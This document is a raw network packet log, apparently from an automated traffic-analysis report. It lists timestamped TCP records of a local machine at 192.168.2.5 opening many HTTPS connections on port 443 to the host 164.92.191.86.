                                                Dec 5, 2024 08:24:23.814583063 CET44349899164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:23.814865112 CET44349902164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:23.814881086 CET44349902164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:23.814937115 CET49902443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:23.815754890 CET49901443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:23.815838099 CET44349901164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:23.816351891 CET49900443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:23.816443920 CET44349900164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:23.819222927 CET49899443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:23.819295883 CET44349899164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:23.819807053 CET49902443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:23.819896936 CET44349902164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:23.820036888 CET49901443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:23.820199013 CET49900443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:23.820266962 CET49899443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:23.820352077 CET49902443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:23.820359945 CET44349902164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:23.860423088 CET49902443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:23.867325068 CET44349900164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:23.867325068 CET44349901164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:23.867326021 CET44349899164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:24.592573881 CET44349902164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:24.595582962 CET44349902164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:24.595673084 CET49902443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:24.595685959 CET44349902164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:24.595773935 CET49902443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:24.596013069 CET44349902164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:24.596091032 CET44349902164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:24.596149921 CET49902443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:24.596313000 CET49902443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:24.596323013 CET44349902164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:24.598737001 CET44349901164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:24.598757029 CET44349901164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:24.598820925 CET49901443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:24.598839998 CET44349901164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:24.603274107 CET49901443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:24.603332043 CET44349901164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:24.603434086 CET49901443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:24.651423931 CET49908443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:24.651473045 CET44349908164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:24.651567936 CET49908443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:24.651844978 CET49908443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:24.651861906 CET44349908164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:24.655214071 CET49909443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:24.655257940 CET44349909164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:24.655359983 CET49909443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:24.655808926 CET49909443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:24.655823946 CET44349909164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:24.656436920 CET49910443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:24.656466007 CET44349910164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:24.656606913 CET49910443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:24.656908035 CET49910443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:24.656924009 CET44349910164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:24.658644915 CET49911443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:24.658655882 CET44349911164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:24.658734083 CET49911443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:24.658925056 CET49911443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:24.658936024 CET44349911164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:24.712876081 CET49912443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:24.712929964 CET44349912164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:24.713013887 CET49912443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:24.713470936 CET49912443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:24.713489056 CET44349912164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:24.755439043 CET44349900164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:24.758479118 CET44349900164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:24.758548021 CET49900443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:24.758565903 CET44349900164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:24.758640051 CET44349900164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:24.758687019 CET49900443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:24.762099028 CET49900443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:24.762123108 CET44349900164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:24.767194033 CET49913443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:24.767265081 CET44349913164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:24.767332077 CET49913443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:24.767535925 CET49913443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:24.767549038 CET44349913164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:25.112498999 CET44349899164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:25.112523079 CET44349899164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:25.112534046 CET44349899164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:25.112550020 CET44349899164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:25.112596035 CET44349899164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:25.112639904 CET49899443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:25.112672091 CET44349899164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:25.112700939 CET49899443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:25.112775087 CET49899443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:25.153963089 CET44349899164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:25.154015064 CET44349899164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:25.154112101 CET49899443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:25.154134989 CET44349899164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:25.154148102 CET49899443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:25.202192068 CET44349899164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:25.202219963 CET44349899164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:25.202363968 CET49899443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:25.202384949 CET44349899164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:25.255023956 CET49899443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:25.328896999 CET44349899164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:25.328908920 CET44349899164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:25.328943014 CET44349899164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:25.328979969 CET44349899164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:25.329046011 CET49899443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:25.329070091 CET44349899164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:25.329111099 CET49899443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:25.329111099 CET49899443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:25.358987093 CET44349899164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:25.359014034 CET44349899164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:25.359147072 CET49899443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:25.359164953 CET44349899164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:25.361530066 CET49899443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:25.363179922 CET44349899164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:25.363277912 CET49899443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:25.388887882 CET44349899164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:25.388900042 CET44349899164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:25.389056921 CET49899443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:25.389080048 CET44349899164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:25.389148951 CET49899443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:25.504393101 CET44349899164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:25.504412889 CET44349899164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:25.504483938 CET49899443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:25.504508972 CET44349899164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:25.504543066 CET49899443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:25.504554987 CET49899443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:25.507628918 CET44349899164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:25.507685900 CET49899443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:25.507699013 CET44349899164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:25.507729053 CET44349899164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:25.507822037 CET49899443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:25.509622097 CET49899443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:25.509643078 CET44349899164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:26.030590057 CET44349908164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:26.037374973 CET44349909164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:26.038888931 CET44349911164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:26.040800095 CET44349910164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:26.065331936 CET49908443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:26.065346003 CET44349908164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:26.065551043 CET49910443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:26.065560102 CET44349910164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:26.065589905 CET49911443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:26.065606117 CET44349911164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:26.065762043 CET49909443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:26.065771103 CET44349909164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:26.065854073 CET44349908164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:26.065987110 CET44349910164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:26.066004038 CET44349911164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:26.066207886 CET44349909164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:26.094614029 CET44349912164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:26.115988016 CET49911443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:26.115998983 CET49908443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:26.115998983 CET49910443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:26.119512081 CET49909443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:26.134401083 CET49912443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:26.147274017 CET44349913164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:26.196825027 CET49913443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:26.366518974 CET49908443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:26.366648912 CET49912443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:26.366674900 CET44349912164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:26.366709948 CET44349908164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:26.366962910 CET49909443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:26.367199898 CET44349909164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:26.367243052 CET49911443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:26.367449045 CET44349911164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:26.367633104 CET49910443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:26.367736101 CET49913443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:26.367758036 CET44349910164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:26.367760897 CET44349913164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:26.367909908 CET44349912164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:26.367974043 CET49912443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:26.368102074 CET49908443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:26.368166924 CET49909443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:26.368192911 CET49911443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:26.368498087 CET49912443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:26.368571043 CET44349912164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:26.368576050 CET49910443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:26.368642092 CET49912443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:26.368649960 CET44349912164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:26.369003057 CET44349913164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:26.369057894 CET49913443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:26.377399921 CET49913443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:26.377485991 CET44349913164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:26.377587080 CET49913443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:26.377593994 CET44349913164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:26.411336899 CET44349909164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:26.415328979 CET44349910164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:26.415328979 CET44349908164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:26.415333986 CET44349911164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:26.417112112 CET49912443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:26.431003094 CET49913443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:26.666891098 CET49920443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:26.666948080 CET44349920164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:26.667011976 CET49920443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:26.667277098 CET49920443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:26.667290926 CET44349920164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:27.066072941 CET44349913164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:27.068783998 CET44349913164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:27.068850040 CET49913443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:27.068898916 CET44349913164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:27.068939924 CET44349913164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:27.068984985 CET49913443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:27.069581032 CET49913443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:27.069614887 CET44349913164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:27.104243994 CET44349912164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:27.108438015 CET44349912164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:27.108489037 CET49912443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:27.108515978 CET44349912164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:27.108680010 CET44349912164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:27.108736038 CET49912443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:27.109014034 CET49912443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:27.109033108 CET44349912164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:27.112421989 CET44349910164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:27.121795893 CET44349908164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:27.121820927 CET44349911164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:27.121845007 CET44349911164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:27.121865034 CET44349911164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:27.121877909 CET44349908164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:27.121898890 CET49911443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:27.121908903 CET44349911164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:27.121937990 CET44349911164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:27.121948004 CET49911443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:27.121977091 CET49908443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:27.121979952 CET49911443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:27.121993065 CET44349908164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:27.122054100 CET49908443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:27.122260094 CET44349908164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:27.122322083 CET44349908164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:27.122370958 CET49908443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:27.122947931 CET44349910164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:27.123033047 CET49910443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:27.125226974 CET49910443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:27.125246048 CET44349910164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:27.141427994 CET49911443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:27.141448975 CET44349911164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:27.142448902 CET49908443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:27.142469883 CET44349908164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:27.142484903 CET49908443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:27.142528057 CET49908443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:27.172692060 CET49922443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:27.172732115 CET44349922164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:27.172812939 CET49922443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:27.176888943 CET49922443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:27.176902056 CET44349922164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:27.179794073 CET49923443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:27.179836035 CET44349923164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:27.179920912 CET49923443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:27.180248022 CET49923443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:27.180262089 CET44349923164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:27.236722946 CET44349909164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:27.236752033 CET44349909164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:27.236823082 CET49909443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:27.236833096 CET44349909164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:27.236918926 CET44349909164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:27.237014055 CET49909443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:27.239902973 CET49909443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:27.239917040 CET44349909164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:27.271275997 CET49925443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:27.271310091 CET44349925164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:27.271456003 CET49925443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:27.271769047 CET49925443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:27.271784067 CET44349925164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:27.353324890 CET49926443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:27.353368044 CET44349926164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:27.353435993 CET49926443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:27.353920937 CET49926443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:27.353935957 CET44349926164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:28.046258926 CET44349920164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:28.046789885 CET49920443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:28.046807051 CET44349920164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:28.047142029 CET44349920164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:28.047883034 CET49920443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:28.047950029 CET44349920164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:28.048219919 CET49920443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:28.091336966 CET44349920164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:28.556220055 CET44349922164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:28.563985109 CET44349923164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:28.617444992 CET49923443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:28.655447006 CET44349925164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:28.740855932 CET44349926164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:28.753348112 CET49922443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:28.753540993 CET49925443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:28.784606934 CET49926443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:28.959844112 CET44349920164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:28.959942102 CET44349920164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:28.960036039 CET49920443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:29.048474073 CET49923443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:29.048499107 CET44349923164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:29.048558950 CET49922443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:29.048582077 CET44349922164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:29.048825026 CET49925443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:29.048854113 CET44349925164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:29.049105883 CET49926443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:29.049124956 CET44349926164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:29.049135923 CET44349922164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:29.049138069 CET44349923164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:29.049288988 CET49920443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:29.049304008 CET44349920164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:29.050080061 CET44349925164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:29.050107956 CET44349925164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:29.050209999 CET49925443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:29.050242901 CET44349926164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:29.050308943 CET49926443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:29.050705910 CET49922443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:29.050782919 CET44349922164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:29.053929090 CET49923443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:29.054028988 CET44349923164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:29.055227041 CET49925443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:29.055335045 CET44349925164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:29.055962086 CET49922443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:29.056051016 CET49923443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:29.056113005 CET49925443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:29.056127071 CET44349925164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:29.056349993 CET49926443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:29.056440115 CET44349926164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:29.056499958 CET49926443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:29.099334002 CET44349923164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:29.103334904 CET44349922164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:29.103343010 CET44349926164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:29.106339931 CET49926443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:29.106355906 CET44349926164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:29.161297083 CET49925443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:29.161358118 CET49926443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:29.515501976 CET44349926164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:29.515582085 CET44349926164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:29.515650988 CET49926443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:29.516599894 CET49926443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:29.516628981 CET44349926164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:29.520811081 CET49932443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:29.520852089 CET44349932164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:29.520952940 CET49932443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:29.525643110 CET49932443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:29.525665045 CET44349932164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:29.803044081 CET44349925164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:29.803051949 CET44349925164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:29.803138971 CET49925443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:29.803153038 CET44349925164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:29.803168058 CET44349925164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:29.803220987 CET49925443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:29.824816942 CET44349923164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:29.832540035 CET44349923164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:29.832588911 CET49923443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:29.838273048 CET44349922164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:29.842344999 CET44349922164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:29.842392921 CET49922443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:29.842417955 CET44349922164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:29.842432976 CET44349922164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:29.842485905 CET49922443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:29.939523935 CET49933443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:29.939562082 CET44349933164.92.191.86192.168.2.5
                                                Dec 5, 2024 08:24:29.939646006 CET49933443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:29.939897060 CET49933443192.168.2.5164.92.191.86
                                                Dec 5, 2024 08:24:29.939912081 CET44349933164.92.191.86192.168.2.5
